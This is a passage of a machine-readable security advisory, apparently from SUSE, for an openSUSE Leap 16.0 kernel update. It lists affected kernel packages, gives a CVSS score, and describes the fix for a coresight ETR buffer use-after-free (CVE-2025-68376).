"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68374"
},
{
"cve": "CVE-2025-68376",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68376"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncoresight: ETR: Fix ETR buffer use-after-free issue\n\nWhen ETR is enabled as CS_MODE_SYSFS, if the buffer size is changed\nand enabled again, currently sysfs_buf will point to the newly\nallocated memory(buf_new) and free the old memory(buf_old). But the\netr_buf that is being used by the ETR remains pointed to buf_old, not\nupdated to buf_new. In this case, it will result in a memory\nuse-after-free issue.\n\nFix this by checking ETR\u0027s mode before updating and releasing buf_old,\nif the mode is CS_MODE_SYSFS, then skip updating and releasing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68376",
"url": "https://www.suse.com/security/cve/CVE-2025-68376"
},
{
"category": "external",
"summary": "SUSE Bug 1255529 for CVE-2025-68376",
